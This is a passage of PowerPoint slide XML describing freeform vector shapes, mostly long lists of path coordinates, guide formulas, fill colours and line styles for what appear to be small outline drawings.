                    <a:lnTo>
                      <a:pt x="77" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36266" name="Freeform 399"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2954" y="2109"/>
                <a:ext cx="93" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 93"/>
                  <a:gd name="T1" fmla="*/ 69 h 81"/>
                  <a:gd name="T2" fmla="*/ 25 w 93"/>
                  <a:gd name="T3" fmla="*/ 52 h 81"/>
                  <a:gd name="T4" fmla="*/ 22 w 93"/>
                  <a:gd name="T5" fmla="*/ 41 h 81"/>
                  <a:gd name="T6" fmla="*/ 11 w 93"/>
                  <a:gd name="T7" fmla="*/ 33 h 81"/>
                  <a:gd name="T8" fmla="*/ 6 w 93"/>
                  <a:gd name="T9" fmla="*/ 40 h 81"/>
                  <a:gd name="T10" fmla="*/ 2 w 93"/>
                  <a:gd name="T11" fmla="*/ 25 h 81"/>
                  <a:gd name="T12" fmla="*/ 5 w 93"/>
                  <a:gd name="T13" fmla="*/ 24 h 81"/>
                  <a:gd name="T14" fmla="*/ 7 w 93"/>
                  <a:gd name="T15" fmla="*/ 24 h 81"/>
                  <a:gd name="T16" fmla="*/ 9 w 93"/>
                  <a:gd name="T17" fmla="*/ 24 h 81"/>
                  <a:gd name="T18" fmla="*/ 14 w 93"/>
                  <a:gd name="T19" fmla="*/ 24 h 81"/>
                  <a:gd name="T20" fmla="*/ 15 w 93"/>
                  <a:gd name="T21" fmla="*/ 22 h 81"/>
                  <a:gd name="T22" fmla="*/ 17 w 93"/>
                  <a:gd name="T23" fmla="*/ 20 h 81"/>
                  <a:gd name="T24" fmla="*/ 18 w 93"/>
                  <a:gd name="T25" fmla="*/ 22 h 81"/>
                  <a:gd name="T26" fmla="*/ 21 w 93"/>
                  <a:gd name="T27" fmla="*/ 24 h 81"/>
                  <a:gd name="T28" fmla="*/ 23 w 93"/>
                  <a:gd name="T29" fmla="*/ 24 h 81"/>
                  <a:gd name="T30" fmla="*/ 27 w 93"/>
                  <a:gd name="T31" fmla="*/ 25 h 81"/>
                  <a:gd name="T32" fmla="*/ 28 w 93"/>
                  <a:gd name="T33" fmla="*/ 22 h 81"/>
                  <a:gd name="T34" fmla="*/ 29 w 93"/>
                  <a:gd name="T35" fmla="*/ 20 h 81"/>
                  <a:gd name="T36" fmla="*/ 28 w 93"/>
                  <a:gd name="T37" fmla="*/ 18 h 81"/>
                  <a:gd name="T38" fmla="*/ 31 w 93"/>
                  <a:gd name="T39" fmla="*/ 16 h 81"/>
                  <a:gd name="T40" fmla="*/ 34 w 93"/>
                  <a:gd name="T41" fmla="*/ 15 h 81"/>
                  <a:gd name="T42" fmla="*/ 34 w 93"/>
                  <a:gd name="T43" fmla="*/ 11 h 81"/>
                  <a:gd name="T44" fmla="*/ 33 w 93"/>
                  <a:gd name="T45" fmla="*/ 8 h 81"/>
                  <a:gd name="T46" fmla="*/ 37 w 93"/>
                  <a:gd name="T47" fmla="*/ 6 h 81"/>
                  <a:gd name="T48" fmla="*/ 41 w 93"/>
                  <a:gd name="T49" fmla="*/ 4 h 81"/>
                  <a:gd name="T50" fmla="*/ 43 w 93"/>
                  <a:gd name="T51" fmla="*/ 3 h 81"/>
                  <a:gd name="T52" fmla="*/ 46 w 93"/>
                  <a:gd name="T53" fmla="*/ 0 h 81"/>
                  <a:gd name="T54" fmla="*/ 59 w 93"/>
                  <a:gd name="T55" fmla="*/ 10 h 81"/>
                  <a:gd name="T56" fmla="*/ 84 w 93"/>
                  <a:gd name="T57" fmla="*/ 15 h 81"/>
                  <a:gd name="T58" fmla="*/ 86 w 93"/>
                  <a:gd name="T59" fmla="*/ 19 h 81"/>
                  <a:gd name="T60" fmla="*/ 87 w 93"/>
                  <a:gd name="T61" fmla="*/ 23 h 81"/>
                  <a:gd name="T62" fmla="*/ 87 w 93"/>
                  <a:gd name="T63" fmla="*/ 24 h 81"/>
                  <a:gd name="T64" fmla="*/ 88 w 93"/>
                  <a:gd name="T65" fmla="*/ 27 h 81"/>
                  <a:gd name="T66" fmla="*/ 91 w 93"/>
                  <a:gd name="T67" fmla="*/ 30 h 81"/>
                  <a:gd name="T68" fmla="*/ 92 w 93"/>
                  <a:gd name="T69" fmla="*/ 31 h 81"/>
                  <a:gd name="T70" fmla="*/ 89 w 93"/>
                  <a:gd name="T71" fmla="*/ 30 h 81"/>
                  <a:gd name="T72" fmla="*/ 88 w 93"/>
                  <a:gd name="T73" fmla="*/ 33 h 81"/>
                  <a:gd name="T74" fmla="*/ 88 w 93"/>
                  <a:gd name="T75" fmla="*/ 37 h 81"/>
                  <a:gd name="T76" fmla="*/ 85 w 93"/>
                  <a:gd name="T77" fmla="*/ 38 h 81"/>
                  <a:gd name="T78" fmla="*/ 82 w 93"/>
                  <a:gd name="T79" fmla="*/ 35 h 81"/>
                  <a:gd name="T80" fmla="*/ 78 w 93"/>
                  <a:gd name="T81" fmla="*/ 34 h 81"/>
                  <a:gd name="T82" fmla="*/ 74 w 93"/>
                  <a:gd name="T83" fmla="*/ 33 h 81"/>
                  <a:gd name="T84" fmla="*/ 70 w 93"/>
                  <a:gd name="T85" fmla="*/ 33 h 81"/>
                  <a:gd name="T86" fmla="*/ 63 w 93"/>
                  <a:gd name="T87" fmla="*/ 32 h 81"/>
                  <a:gd name="T88" fmla="*/ 58 w 93"/>
                  <a:gd name="T89" fmla="*/ 32 h 81"/>
                  <a:gd name="T90" fmla="*/ 53 w 93"/>
                  <a:gd name="T91" fmla="*/ 29 h 81"/>
                  <a:gd name="T92" fmla="*/ 47 w 93"/>
                  <a:gd name="T93" fmla="*/ 30 h 81"/>
                  <a:gd name="T94" fmla="*/ 41 w 93"/>
                  <a:gd name="T95" fmla="*/ 33 h 81"/>
                  <a:gd name="T96" fmla="*/ 36 w 93"/>
                  <a:gd name="T97" fmla="*/ 32 h 81"/>
                  <a:gd name="T98" fmla="*/ 35 w 93"/>
                  <a:gd name="T99" fmla="*/ 39 h 81"/>
                  <a:gd name="T100" fmla="*/ 38 w 93"/>
                  <a:gd name="T101" fmla="*/ 42 h 81"/>
                  <a:gd name="T102" fmla="*/ 42 w 93"/>
                  <a:gd name="T103" fmla="*/ 50 h 81"/>
                  <a:gd name="T104" fmla="*/ 44 w 93"/>
                  <a:gd name="T105" fmla="*/ 54 h 81"/>
                  <a:gd name="T106" fmla="*/ 50 w 93"/>
                  <a:gd name="T107" fmla="*/ 60 h 81"/>
                  <a:gd name="T108" fmla="*/ 57 w 93"/>
                  <a:gd name="T109" fmla="*/ 68 h 81"/>
                  <a:gd name="T110" fmla="*/ 61 w 93"/>
                  <a:gd name="T111" fmla="*/ 74 h 81"/>
                  <a:gd name="T112" fmla="*/ 63 w 93"/>
                  <a:gd name="T113" fmla="*/ 81 h 81"/>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93"/>
                  <a:gd name="T172" fmla="*/ 0 h 81"/>
                  <a:gd name="T173" fmla="*/ 93 w 93"/>
                  <a:gd name="T174" fmla="*/ 81 h 81"/>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93" h="81">
                    <a:moveTo>
                      <a:pt x="63" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="81"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36267" name="Freeform 400"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3019" y="2190"/>
                <a:ext cx="14" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 1 h 12"/>
                  <a:gd name="T2" fmla="*/ 1 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 12"/>
                  <a:gd name="T4" fmla="*/ 2 w 14"/>
                  <a:gd name="T5" fmla="*/ 0 h 12"/>
                  <a:gd name="T6" fmla="*/ 3 w 14"/>
                  <a:gd name="T7" fmla="*/ 0 h 12"/>
                  <a:gd name="T8" fmla="*/ 3 w 14"/>
                  <a:gd name="T9" fmla="*/ 1 h 12"/>
                  <a:gd name="T10" fmla="*/ 4 w 14"/>
                  <a:gd name="T11" fmla="*/ 2 h 12"/>
                  <a:gd name="T12" fmla="*/ 5 w 14"/>
                  <a:gd name="T13" fmla="*/ 3 h 12"/>
                  <a:gd name="T14" fmla="*/ 6 w 14"/>
                  <a:gd name="T15" fmla="*/ 3 h 12"/>
                  <a:gd name="T16" fmla="*/ 7 w 14"/>
                  <a:gd name="T17" fmla="*/ 3 h 12"/>
